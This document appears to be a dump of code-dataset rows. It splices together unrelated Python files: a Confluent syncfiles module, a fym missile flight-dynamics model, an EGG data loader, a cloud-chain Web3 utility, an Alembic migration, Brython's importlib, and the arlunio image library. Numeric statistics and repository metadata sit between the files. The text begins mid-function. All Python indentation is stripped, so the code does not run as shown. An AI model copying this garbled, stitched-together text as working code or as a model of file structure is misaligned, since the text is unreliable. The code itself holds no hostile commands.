if ent in ('APPENDONCE:', 'MERGE:', 'REPLACE:'):
secname = ent
if ent[0] == '<':
subfilename = ent[1:]
if subfilename[-1] == '>':
subfilename = subfilename[:-1]
if subfilename[0] != '/':
subfilename = os.path.join(os.path.dirname(filename), subfilename)
for subent in get_entries(subfilename):
yield subent
yield secname
else:
yield ent
class SyncList(object):
def __init__(self, filename, nodename, cfg):
slist = None
self.replacemap = {}
self.appendmap = {}
self.appendoncemap = {}
self.mergemap = {}
self.optmap = {}
entries = get_entries(filename)
currmap = self.replacemap
for ent in entries:
try:
cmtidx = ent.index('#')
ent = ent[:cmtidx]
except ValueError:
pass
for special in '$%^&|{}':
if special in ent:
raise Exception(
'Special character "{}" reserved for future use'.format(special))
ent = ent.strip()
if not ent:
continue
if ent[-1] == ':':
if ent == 'MERGE:':
currmap = self.mergemap
elif ent == 'APPENDONCE:':
currmap = self.appendoncemap
elif ent == 'REPLACE:':
currmap = self.replacemap
else:
raise Exception(
'Section "{}" is not currently supported in syncfiles'.format(ent[:-1]))
continue
if '->' in ent:
k, v = ent.split('->')
k = k.strip()
v = v.strip()
if ':' in v:
nr, v = v.split(':', 1)
for candidate in noderange.NodeRange(nr, cfg).nodes:
if candidate == nodename:
break
else:
continue
optparts = v.split()
v = optparts[0]
optparts = optparts[1:]
else:
kparts = []
optparts = []
currparts = kparts
for part in ent.split():
if part[0] == '(':
currparts = optparts
currparts.append(part)
k = ' '.join(kparts)
v = None
entopts = {}
if optparts:
if optparts[0][0] != '(' or optparts[-1][-1] != ')':
raise Exception("Unsupported syntax in syncfile: " + ent)
opts = ','.join(optparts)
opts = opts[1:-1]
for opt in opts.split(','):
optname, optval = opt.split('=')
if optname == 'owner':
try:
uid = pwd.getpwnam(optval).pw_uid
except KeyError:
uid = None
optval = {'name': optval, 'id': uid}
elif optname == 'group':
try:
gid = grp.getgrnam(optval).gr_gid
except KeyError:
gid = None
optval = {'name': optval, 'id': gid}
entopts[optname] = optval
currmap[k] = v
targ = v if v else k
for f in targ.split():
self.optmap[f] = entopts
def sync_list_to_node(sl, node, suffixes):
targdir = tempfile.mkdtemp('.syncto{}'.format(node))
output = ''
try:
for ent in sl.replacemap:
stage_ent(sl.replacemap, ent, targdir)
if 'append' in suffixes:
while suffixes['append'] and suffixes['append'][0] == '/':
suffixes['append'] = suffixes['append'][1:]
for ent in sl.appendmap:
stage_ent(sl.appendmap, ent,
os.path.join(targdir, suffixes['append']))
if 'merge' in suffixes:
while suffixes['merge'] and suffixes['merge'][0] == '/':
suffixes['merge'] = suffixes['merge'][1:]
for ent in sl.mergemap:
stage_ent(sl.mergemap, ent,
os.path.join(targdir, suffixes['merge']), True)
if 'appendonce' in suffixes:
while suffixes['appendonce'] and suffixes['appendonce'][0] == '/':
suffixes['appendonce'] = suffixes['appendonce'][1:]
for ent in sl.appendoncemap:
stage_ent(sl.appendoncemap, ent,
os.path.join(targdir, suffixes['appendonce']), True)
sshutil.prep_ssh_key('/etc/confluent/ssh/automation')
output = util.run(
['rsync', '-rvLD', targdir + '/', 'root@{}:/'.format(node)])[0]
except Exception as e:
if 'CalledProcessError' not in repr(e):
# https://github.com/eventlet/eventlet/issues/413
# for some reason, can't catch the calledprocesserror normally
# for this exception, implement a hack workaround
raise
unreadablefiles = []
for root, dirnames, filenames in os.walk(targdir):
for filename in filenames:
filename = os.path.join(root, filename)
try:
with open(filename, 'r') as _:
pass
except OSError as e:
unreadablefiles.append(filename.replace(targdir, ''))
if unreadablefiles:
raise Exception("Syncing failed due to unreadable files: " + ','.join(unreadablefiles))
else:
raise
finally:
shutil.rmtree(targdir)
if not isinstance(output, str):
output = output.decode('utf8')
retval = {
'options': sl.optmap,
'output': output,
}
return retval # need dictionary with output and options
def stage_ent(currmap, ent, targdir, appendexist=False):
dst = currmap[ent]
everyfent = []
allfents = ent.split()
for tmpent in allfents:
fents = glob.glob(tmpent)
everyfent.extend(fents)
if not everyfent:
raise Exception('No matching files for "{}"'.format(ent))
if dst is None: # this is to indicate source and destination as one
dst = os.path.dirname(everyfent[0]) + '/'
while dst and dst[0] == '/':
dst = dst[1:]
if len(everyfent) > 1 and dst[-1] != '/':
raise Exception(
'Multiple files match {}, {} needs a trailing slash to indicate a directory'.format(ent, dst))
fulltarg = os.path.join(targdir, dst)
for targ in everyfent:
mkpathorlink(targ, fulltarg, appendexist)
def mkpathorlink(source, destination, appendexist=False):
if os.path.isdir(source):
mkdirp(destination)
for ent in os.listdir(source):
currsrc = os.path.join(source, ent)
currdst = os.path.join(destination, ent)
mkpathorlink(currsrc, currdst)
else:
if destination[-1] == '/':
mkdirp(destination)
destination = os.path.join(destination, os.path.basename(source))
else:
mkdirp(os.path.dirname(destination))
if appendexist and os.path.exists(destination):
tmpnam = tempfile.mktemp()
shutil.copy(destination, tmpnam)
os.remove(destination)
with open(destination, 'w') as realdest:
with open(tmpnam) as olddest:
realdest.write(olddest.read())
with open(source) as sourcedata:
realdest.write(sourcedata.read())
os.remove(tmpnam)
else:
os.symlink(source, destination)
syncrunners = {}
def start_syncfiles(nodename, cfg, suffixes):
deployinfo = cfg.get_node_attributes(
nodename, ('deployment.*',))
deployinfo = deployinfo.get(nodename, {})
profile = deployinfo.get(
'deployment.pendingprofile', {}).get('value', '')
if not profile:
profile = deployinfo.get(
'deployment.stagedprofile', {}).get('value', '')
if not profile:
profile = deployinfo.get(
'deployment.profile', {}).get('value', '')
if not profile:
raise Exception('Cannot perform syncfiles without profile assigned')
synclist = '/var/lib/confluent/public/os/{}/syncfiles'.format(profile)
if not os.path.exists(synclist):
return '200 OK' # not running
sl = SyncList(synclist, nodename, cfg)
if not (sl.appendmap or sl.mergemap or sl.replacemap or sl.appendoncemap):
return '200 OK' # the synclist has no actual entries
syncrunners[nodename] = eventlet.spawn(
sync_list_to_node, sl, nodename, suffixes)
return '202 Queued' # backgrounded
def get_syncresult(nodename):
if nodename not in syncrunners:
return ('204 Not Running', '')
if not syncrunners[nodename].dead:
return ('200 OK', '')
result = syncrunners[nodename].wait()
del syncrunners[nodename]
return ('200 OK', result)
| 37.334507
| 106
| 0.529661
| 1,097
| 10,603
| 5.094804
| 0.273473
| 0.017177
| 0.016103
| 0.007157
| 0.072106
| 0.042226
| 0.027196
| 0.017892
| 0.017892
| 0
| 0
| 0.010135
| 0.357918
| 10,603
| 283
| 107
| 37.466431
| 0.810811
| 0.084127
| 0
| 0.18254
| 0
| 0
| 0.086912
| 0.012283
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031746
| false
| 0.007937
| 0.039683
| 0
| 0.103175
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86559f8329a6ab4177af7e36ab701bd44241c349
| 1,804
|
py
|
Python
|
fym/models/missile.py
|
JungYT/fym
|
d519c50086e3c7793b960e0326c92ed407836790
|
[
"MIT"
] | 14
|
2019-08-23T10:02:39.000Z
|
2021-12-24T13:04:43.000Z
|
fym/models/missile.py
|
JungYT/fym
|
d519c50086e3c7793b960e0326c92ed407836790
|
[
"MIT"
] | 110
|
2019-08-23T08:09:32.000Z
|
2021-06-29T06:54:48.000Z
|
fym/models/missile.py
|
JungYT/fym
|
d519c50086e3c7793b960e0326c92ed407836790
|
[
"MIT"
] | 10
|
2019-09-02T03:49:06.000Z
|
2021-05-10T04:35:40.000Z
|
import numpy as np
from fym.core import BaseSystem
class MissilePlanar(BaseSystem):
R = 288
g = 9.80665
S = 1
t1 = 1.5
t2 = 8.5
name = 'missile'
def __init__(self, initial_state):
super().__init__(initial_state)
def external(self, states, controls):
return 0
# return {"wind" : [(0, 0), (0, 0)]} # no external effects
def deriv(self, state, t, control, external):
# state and (control) input
x, y, V, gamma, = state.ravel()
a = control
# temperature
if y <= 11000:
Tmp = 288.16 - 0.0065*y
else:
Tmp = 216.66
# Mach number
M = V/(1.4*self.R*Tmp)**0.5
# Mass and thrust (Note: guidance loop is closed after t=t1)
if t < self.t1:
m = 135 - 14.53*t
T = 33000
elif t < self.t2:
m = 113.205 - 3.331*t
T = 7500
else:
m = 90.035
T = 0
# density and dynamic pressure
rho = (1.15579 - 1.058*1e-4*y + 3.725*1e-9*y**2
- 6.0*1e-14*y**3) # y in [0, 20000]
Q = 0.5*rho*V**2
# Drag model
if M < 0.93:
Cd0 = 0.02
elif M < 1.03:
Cd0 = 0.02 + 0.2*(M - 0.93)
elif M < 1.10:
Cd0 = 0.04 + 0.06*(M - 1.03)
else:
Cd0 = 0.0442 - 0.007*(M - 1.10)
if M < 1.15:
K = 0.2
else:
K = 0.2 + 0.246*(M - 1.15)
D0 = Cd0*Q*self.S
Di = K*m**2*a**2/(Q*self.S)
D = D0 + Di
dxdt = V*np.cos(gamma)
dydt = V*np.sin(gamma)
dVdt = (T - D)/m - self.g*np.sin(gamma)
dgammadt = (a - self.g*np.cos(gamma))/V
return np.vstack([dxdt, dydt, dVdt, dgammadt])
| 25.408451
| 68
| 0.444568
| 279
| 1,804
| 2.83871
| 0.422939
| 0.015152
| 0.007576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.167608
| 0.411308
| 1,804
| 70
| 69
| 25.771429
| 0.578154
| 0.121951
| 0
| 0.075472
| 0
| 0
| 0.004447
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056604
| false
| 0
| 0.037736
| 0.018868
| 0.264151
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8655ba3bbd3cf852e91a43d33c2f2f32d558bc09
| 2,175
|
py
|
Python
|
egg/zoo/addition/data.py
|
chengemily/EGG
|
40e84228e9d6e9ae785c0e4a846bb7e12e2b9291
|
[
"MIT"
] | 1
|
2022-03-01T18:57:48.000Z
|
2022-03-01T18:57:48.000Z
|
egg/zoo/addition/data.py
|
chengemily/EGG
|
40e84228e9d6e9ae785c0e4a846bb7e12e2b9291
|
[
"MIT"
] | null | null | null |
egg/zoo/addition/data.py
|
chengemily/EGG
|
40e84228e9d6e9ae785c0e4a846bb7e12e2b9291
|
[
"MIT"
] | null | null | null |
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import Iterable, Optional, Tuple
import torch
from torch.utils.data import DataLoader
class ScaledDataset:
def __init__(self, examples, scaling_factor=1):
self.examples = examples
self.scaling_factor = scaling_factor
def __len__(self):
return len(self.examples) * self.scaling_factor
def __getitem__(self, k):
k = k % len(self.examples)
return self.examples[k]
def get_dataloaders(opts) -> Tuple[Iterable[
Tuple[torch.Tensor, torch.Tensor, Optional[torch.Tensor]]
], Iterable[
Tuple[torch.Tensor, torch.Tensor, Optional[torch.Tensor]]
]]:
"Returning an iterator for tuple(sender_input, labels, receiver_input)."
full_data = enumerate_dataset(opts.input_size)
len_train = int(opts.training_density * len(full_data))
train_set, holdout_set = torch.utils.data.random_split(full_data,
[len_train, len(full_data) - len_train]
)
validation_set = train_set
train_set = ScaledDataset(train_set, opts.data_scaler)
train_loader, validation_loader, holdout_loader = DataLoader(train_set, batch_size=opts.batch_size, shuffle=True), \
DataLoader(validation_set, batch_size=len(validation_set)), \
DataLoader(holdout_set, batch_size=opts.batch_size)
return train_loader, validation_loader, holdout_loader
def enumerate_dataset(input_size):
data = []
labels = []
for i in range(input_size):
for j in range(input_size):
inp = torch.zeros(2 * input_size)
inp[i] = 1.0
inp[input_size + j] = 1.0
label = torch.zeros(2 * input_size - 1)
label[i + j] = 1.0
data.append(inp)
labels.append(label)
data_tuples = [(data[i], labels[i]) for i in range(len(data))]
return data_tuples
| 32.462687
| 120
| 0.624368
| 269
| 2,175
| 4.821561
| 0.319703
| 0.048574
| 0.027756
| 0.038551
| 0.214341
| 0.1835
| 0.083269
| 0.083269
| 0.083269
| 0
| 0
| 0.006423
| 0.284138
| 2,175
| 66
| 121
| 32.954545
| 0.82659
| 0.110345
| 0
| 0.046512
| 0
| 0
| 0.035
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116279
| false
| 0
| 0.069767
| 0.023256
| 0.302326
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8657acef2a48725b54eda761add6bd9a28ac1231
| 3,379
|
py
|
Python
|
simulation-web3py/utility.py
|
miker83z/cloud-chain
|
0f5c43159544da547173ee0425e78bede261513b
|
[
"MIT"
] | null | null | null |
simulation-web3py/utility.py
|
miker83z/cloud-chain
|
0f5c43159544da547173ee0425e78bede261513b
|
[
"MIT"
] | null | null | null |
simulation-web3py/utility.py
|
miker83z/cloud-chain
|
0f5c43159544da547173ee0425e78bede261513b
|
[
"MIT"
] | 1
|
2022-01-27T14:18:24.000Z
|
2022-01-27T14:18:24.000Z
|
import json
import os
from argparse import ArgumentTypeError
from eth_typing import Address
from web3.contract import Contract
from settings import MIN_VAL, MAX_VAL, DEPLOYED_CONTRACTS, CONFIG_DIR
async def init_simulation(contracts: [], factor: float, fn: str, status_init: bool) -> bool:
statuses = [True]
try:
if status_init:
for c in contracts:
# Use different cloud_addresses for each contract instance
cloud_address, cloud_status_ok = await c.cloud_sla_creation_activation()
c.set_cloud_sla_address(cloud_address)
statuses.append(cloud_status_ok)
if fn == 'read' or fn == 'read_deny_lost_file_check' or fn == 'file_check_undeleted_file':
statuses.append(await c.upload())
if fn == 'file_check_undeleted_file':
statuses.append(await c.read())
if fn == 'corrupted_file_check':
statuses.append(await c.another_file_upload_read())
if fn == 'delete':
for _ in range(round(factor / DEPLOYED_CONTRACTS) + 1):
statuses.append(await c.upload())
else:
for c in contracts:
if fn == 'delete':
if c.tx_upload_count < round(factor / DEPLOYED_CONTRACTS) + 1:
for _ in range(abs(c.tx_upload_count - (round(factor / DEPLOYED_CONTRACTS) + 1))):
statuses.append(await c.upload())
except ValueError as v:
print(f'{type(v)} [init_sim]: {v}')
else:
return check_statuses(statuses)
def get_credentials(blockchain: str) -> tuple:
if blockchain == 'polygon':
from settings import (
polygon_private_keys
)
return polygon_private_keys
from settings import (
quorum_private_keys
)
return quorum_private_keys
def get_contract(w3, address: Address, compiled_contract_path: str) -> Contract:
def get_abi(path: str) -> list:
with open(path) as file:
contract_json = json.load(file)
contract_abi = contract_json['abi']
return contract_abi
abi = get_abi(compiled_contract_path)
contract = w3.eth.contract(address=address, abi=abi)
return contract
def check_statuses(statuses: []) -> bool:
for idx in range(len(statuses)):
if statuses[idx] == 0:
return False
return True
def exists_mkdir(paths: []):
for path in paths:
if not os.path.exists(path):
os.mkdir(path)
def get_contracts_config(blockchain: str, msg: bool = True):
if msg:
print('Retrieve config file...')
filename = f'{blockchain}.json'
filepath = os.path.join(os.getcwd(), CONFIG_DIR, filename)
with open(filepath) as file:
contracts_summary = json.loads(file.read())
if msg:
print(f'Config file retrieved at {filepath}.')
return contracts_summary
def range_limited_val(arg: str) -> int:
"""
Type function for argparse - int within some predefined bounds.
"""
try:
s = int(arg)
except ValueError:
raise ArgumentTypeError("must be a int number")
if s < MIN_VAL or s > MAX_VAL:
raise ArgumentTypeError(f"argument must be > {str(MIN_VAL)} and < {str(MAX_VAL)}")
return s
| 32.805825
| 106
| 0.612607
| 415
| 3,379
| 4.795181
| 0.303614
| 0.01809
| 0.047739
| 0.050251
| 0.131156
| 0.128141
| 0.128141
| 0.128141
| 0.128141
| 0.055276
| 0
| 0.002929
| 0.29269
| 3,379
| 102
| 107
| 33.127451
| 0.829707
| 0.035809
| 0
| 0.189873
| 0
| 0
| 0.091302
| 0.023134
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088608
| false
| 0
| 0.101266
| 0
| 0.303797
| 0.037975
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8657d90fe7092bbdb91cfe26101bae5ad4366000
| 808
|
py
|
Python
|
migrations/versions/816ea3631582_add_topics.py
|
OpenASL/HowSignBot
|
bd9c5bc0edfd6fb50bdce7c7c1d84462e1e704c2
|
[
"MIT"
] | 9
|
2021-01-12T07:28:30.000Z
|
2021-12-30T09:27:04.000Z
|
migrations/versions/816ea3631582_add_topics.py
|
OpenASL/HowSignBot
|
bd9c5bc0edfd6fb50bdce7c7c1d84462e1e704c2
|
[
"MIT"
] | 16
|
2021-03-28T16:31:42.000Z
|
2022-03-21T00:18:30.000Z
|
migrations/versions/816ea3631582_add_topics.py
|
OpenASL/HowSignBot
|
bd9c5bc0edfd6fb50bdce7c7c1d84462e1e704c2
|
[
"MIT"
] | 1
|
2021-07-18T20:49:19.000Z
|
2021-07-18T20:49:19.000Z
|
"""add topics
Revision ID: 816ea3631582
Revises: 37a124b0099b
Create Date: 2021-03-13 14:20:10.044131
"""
from alembic import op
import sqlalchemy as sa
import bot
# revision identifiers, used by Alembic.
revision = "816ea3631582"
down_revision = "37a124b0099b"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"topics",
sa.Column("content", sa.Text(), nullable=False),
sa.Column("last_synced_at", bot.database.TIMESTAMP(timezone=True), nullable=True),
sa.PrimaryKeyConstraint("content"),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table("topics")
# ### end Alembic commands ###
| 23.085714
| 90
| 0.674505
| 96
| 808
| 5.604167
| 0.59375
| 0.050186
| 0.078067
| 0.085502
| 0.163569
| 0.163569
| 0.163569
| 0.163569
| 0
| 0
| 0
| 0.089094
| 0.194307
| 808
| 34
| 91
| 23.764706
| 0.737327
| 0.361386
| 0
| 0
| 0
| 0
| 0.133612
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.1875
| 0
| 0.3125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86582bc3a8c357318983a8612ae2ca233e2c4562
| 3,137
|
py
|
Python
|
src/Lib/importlib/__init__.py
|
NUS-ALSET/ace-react-redux-brython
|
d009490263c5716a145d9691cd59bfcd5aff837a
|
[
"MIT"
] | 1
|
2021-08-05T12:45:39.000Z
|
2021-08-05T12:45:39.000Z
|
src/Lib/importlib/__init__.py
|
NUS-ALSET/ace-react-redux-brython
|
d009490263c5716a145d9691cd59bfcd5aff837a
|
[
"MIT"
] | null | null | null |
src/Lib/importlib/__init__.py
|
NUS-ALSET/ace-react-redux-brython
|
d009490263c5716a145d9691cd59bfcd5aff837a
|
[
"MIT"
] | 1
|
2019-09-05T08:20:07.000Z
|
2019-09-05T08:20:07.000Z
|
"""A pure Python implementation of import."""
__all__ = ['__import__', 'import_module', 'invalidate_caches']
# Bootstrap help #####################################################
# Until bootstrapping is complete, DO NOT import any modules that attempt
# to import importlib._bootstrap (directly or indirectly). Since this
# partially initialised package would be present in sys.modules, those
# modules would get an uninitialised copy of the source version, instead
# of a fully initialised version (either the frozen one or the one
# initialised below if the frozen one is not available).
import _imp # Just the builtin component, NOT the full Python module
import sys
from . import machinery
from . import _bootstrap
_bootstrap._setup(sys, _imp)
# To simplify imports in test code
_w_long = _bootstrap._w_long
_r_long = _bootstrap._r_long
# Fully bootstrapped at this point, import whatever you like, circular
# dependencies and startup overhead minimisation permitting :)
# Public API #########################################################
from ._bootstrap import __import__
def invalidate_caches():
"""Call the invalidate_caches() method on all meta path finders stored in
sys.meta_path (where implemented)."""
for finder in sys.meta_path:
if hasattr(finder, 'invalidate_caches'):
finder.invalidate_caches()
def find_loader(name, path=None):
"""Find the loader for the specified module.
First, sys.modules is checked to see if the module was already imported. If
so, then sys.modules[name].__loader__ is returned. If that happens to be
set to None, then ValueError is raised. If the module is not in
sys.modules, then sys.meta_path is searched for a suitable loader with the
value of 'path' given to the finders. None is returned if no loader could
be found.
Dotted names do not have their parent packages implicitly imported. You will
most likely need to explicitly import all parent packages in the proper
order for a submodule to get the correct loader.
"""
try:
loader = sys.modules[name].__loader__
if loader is None:
raise ValueError('{}.__loader__ is None'.format(name))
else:
return loader
except KeyError:
pass
return _bootstrap._find_module(name, path)
def import_module(name, package=None):
"""Import a module.
The 'package' argument is required when performing a relative import. It
specifies the package to use as the anchor point from which to resolve the
relative import to an absolute import.
"""
level = 0
if name.startswith('.'):
if not package:
raise TypeError("relative imports require the 'package' argument")
for character in name:
if character != '.':
break
level += 1
return _bootstrap._gcd_import(name[level:], package, level)
#need at least one import hook for importlib stuff to work.
from . import basehook
sys.meta_path.append(basehook.BaseHook())
| 36.057471
| 81
| 0.668792
| 409
| 3,137
| 4.98533
| 0.425428
| 0.039235
| 0.021579
| 0.012751
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.000832
| 0.233663
| 3,137
| 86
| 82
| 36.476744
| 0.847338
| 0.532037
| 0
| 0
| 0
| 0
| 0.108085
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085714
| false
| 0.028571
| 0.285714
| 0
| 0.457143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86589b5f56644ed9997dc3b47f7f98c31f2ddd04
| 8,848
|
py
|
Python
|
lib/arlunio/arlunio/image.py
|
swyddfa/stylo
|
4d6b348ce5812dc5c2554bfd21a1550375aa05e1
|
[
"MIT"
] | null | null | null |
lib/arlunio/arlunio/image.py
|
swyddfa/stylo
|
4d6b348ce5812dc5c2554bfd21a1550375aa05e1
|
[
"MIT"
] | 13
|
2019-06-02T21:26:52.000Z
|
2019-08-04T15:54:41.000Z
|
lib/arlunio/arlunio/image.py
|
swyddfa/stylo
|
4d6b348ce5812dc5c2554bfd21a1550375aa05e1
|
[
"MIT"
] | 1
|
2019-07-08T17:00:56.000Z
|
2019-07-08T17:00:56.000Z
|
from __future__ import annotations
import base64
import io
import logging
import pathlib
from typing import Optional
# TODO: Remove these, as they should be contained in the numpy backend.
import numpy as np
import PIL.Image as PImage
import arlunio.ast as ast
import arlunio.color as color
import arlunio.mask as mask
import arlunio.math as math
logger = logging.getLogger(__name__)
class Image:
"""Our representation of an image, implemented as a wrapper around a standard
Pillow image."""
def __init__(self, img: PImage.Image):
self.img = img
"""The wrapped pillow image object."""
def __eq__(self, other):
if not isinstance(other, Image):
return False
a = np.asarray(self.img)
b = np.asarray(other.img)
return (a == b).all()
def __add__(self, other):
if isinstance(other, Image):
other = other.img
if not isinstance(other, PImage.Image):
raise TypeError("Addition is only supported between images.")
img = self.copy()
img.alpha_composite(other)
return img
@property
def __array_interface__(self):
# Ensure that our version of an image also plays nice with numpy.
return self.img.__array_interface__
def _repr_png_(self):
# Give nice previews in jupyter notebooks
return self.img._repr_png_()
@property
def size(self):
return self.img.size
def alpha_composite(self, im, *args, **kwargs):
"""Composites an image onto this image.
See :meth:`pillow:PIL.Image.Image.alpha_composite`
"""
if isinstance(im, Image):
im = im.img
self.img.alpha_composite(im, *args, **kwargs)
def copy(self):
"""Return a copy of the image.
See :meth:`pillow:PIL.Image.Image.copy`
"""
return Image(self.img.copy())
def paste(self, *args, **kwargs):
"""Paste another image into this image.
See :meth:`pillow:PIL.Image.Image.paste`
"""
self.img.paste(*args, **kwargs)
def save(self, *args, **kwargs):
"""Save the image with the given filename.
See :meth:`pillow:PIL.Image.Image.save`
"""
self.img.save(*args, **kwargs)
def thumbnail(self, *args, **kwargs):
"""Convert this image into a thumbail.
See :meth:`pillow:PIL.Image.Image.thumbnail`
"""
self.img.thumbnail(*args, **kwargs)
def new(color) -> Image:
"""Creates a new image with the given background color."""
return ast.Node.builtin(name="image", color=color)
def fromarray(*args, **kwargs):
"""Create an image from an array
See :func:`pillow:PIL.Image.fromarray`
"""
return Image(PImage.fromarray(*args, **kwargs))
def load(*args, **kwargs) -> Image:
"""Load an image from the given file.
See :func:`pillow:PIL.Image.open`
"""
return Image(PImage.open(*args, **kwargs))
def save(image: Image, filename: str, mkdirs: bool = False) -> None:
"""Save an image in PNG format.
:param filename: The filepath to save the image to.
:param mkdirs: If true, make any parent directories
"""
path = pathlib.Path(filename)
if not path.parent.exists() and mkdirs:
path.parent.mkdir(parents=True)
with open(filename, "wb") as f:
image.save(f)
def encode(image: Image) -> bytes:
"""Return the image encoded as a base64 string.
Parameters
----------
image:
The image to encode.
Example
-------
::
>>> import arlunio.image as image
>>> img = image.new((8, 8), color='red')
>>> image.encode(img)
b'iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAYAAADED76LAAAAFklEQVR4nGP8z8DwnwEPYMInOXwUAAASWwIOH0pJXQAAAABJRU5ErkJggg=='
"""
with io.BytesIO() as byte_stream:
image.save(byte_stream, "PNG")
image_bytes = byte_stream.getvalue()
return base64.b64encode(image_bytes)
def decode(bytestring: bytes) -> Image:
"""Decode the image represented by the given bytestring into an image object.
Parameters
----------
bytestring:
The bytestring to decode.
Example
-------
.. arlunio-image:: Decode Example
:include-code:
::
import arlunio.image as image
bytestring = b'iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAYAAADED76LAAAAFklEQVR4nGP8z8DwnwEPYMInOXwUAAASWwIOH0pJXQAAAABJRU5ErkJggg==' # noqa: E501
img = image.decode(bytestring)
"""
data = base64.b64decode(bytestring)
bytes_ = io.BytesIO(data)
return Image(load(bytes_))
def colorramp(values, start: Optional[str] = None, stop: Optional[str] = None) -> Image:
"""Given a 2d array of values, produce an image gradient based on them.
.. arlunio-image:: Colorramp Demo
:align: right
::
import arlunio.image as image
import arlunio.math as math
import numpy as np
cartesian = math.Cartesian()
p = cartesian(width=256, height=256)
x, y = p[:, :, 0], p[:, :, 1]
values = np.sin(2*x*np.pi) * np.sin(2*y* np.pi)
img = image.colorramp(values)
First this function will scale the input array so that all values fall in the range
:math:`[0, 1]`. It will then produce an image with the same dimensions as the
original array. The color of each pixel will be chosen based on the corresponding
value of the scaled array.
- If the value is :math:`0` the color will be given by the :code:`start` parameter
- If the value is :math:`1` the color will be given by the :code:`stop` parameter
- Otherwise the color will be some mix between the two.
Parameters
----------
values:
The array of values used to decide on the color.
start:
The color to use for values near :math:`0` (default, :code:`black`)
stop:
The color to use for values near :math:`1` (default, :code:`white`)
Examples
--------
.. arlunio-image:: Colorramp Demo 2
:include-code:
::
import arlunio.image as image
import arlunio.math as math
import numpy as np
cartesian = math.Cartesian()
p = cartesian(width=256, height=256)
x = image.colorramp(p[:, :, 0], start="#0000", stop="#f007")
y = image.colorramp(p[:, :, 1], start="#0000", stop="#00f7")
img = x + y
"""
# Scale all the values so that they fall into the range [0, 1]
minx = np.min(values)
vs = np.array(values) - minx
vs = vs / np.max(vs)
if start is None:
start = "black"
if stop is None:
stop = "white"
start = color.getcolor(start, "RGBA")
stop = color.getcolor(stop, "RGBA")
funcs = [math.lerp(a, b) for a, b in zip(start, stop)]
channels = [np.floor(func(vs)) for func in funcs]
pixels = np.array(np.dstack(channels), dtype=np.uint8)
return fromarray(pixels)
def fill(
region,
foreground: Optional[str] = None,
background: Optional[str] = None,
image: Optional[Image] = None,
) -> Image:
"""Apply color to an image, as specified by a mask.
Parameters
----------
mask:
The mask that selects the region to be coloured
foreground:
A string representation of the color to use, this can be in any format that is
supported by the :mod:`pillow:PIL.ImageColor` module. If omitted this will
default to black.
background:
In the case where an existing image is not provided this parameter can be used
to set the background color of the generated image. This can be any string that
is accepted by the :mod:`pillow:PIL.ImageColor` module. If omitted this will
default to transparent
image:
The image to color in, if omitted a blank image will be used.
Example
--------
.. arlunio-image:: Fill Demo
:include-code:
::
import arlunio.image as image
import arlunio.shape as shape
circle = shape.Circle(x0=-0.5, y0=0.25, r=0.6)
img = image.fill(circle(width=512, height=256), foreground='red')
circle.x0, circle.y0 = 0, 0
img = image.fill(circle(width=512, height=256), foreground='#0f0', image=img)
circle.x0, circle.y0 = 0.5, -0.25
img = image.fill(circle(width=512, height=256), foreground='blue', image=img)
"""
foreground = "#000" if foreground is None else foreground
fill_color = color.getcolor(foreground, "RGBA")
if image is None:
background = "#0000" if background is None else background
image = new(color=background)
if not isinstance(region, ast.Node):
region = region()
return ast.Node.fill(image, region, fill_color)
| 26.570571
| 148
| 0.617315
| 1,154
| 8,848
| 4.690641
| 0.235702
| 0.02882
| 0.018105
| 0.014779
| 0.18474
| 0.155921
| 0.146314
| 0.133937
| 0.099575
| 0.063551
| 0
| 0.018996
| 0.268196
| 8,848
| 332
| 149
| 26.650602
| 0.816988
| 0.520231
| 0
| 0.020202
| 0
| 0
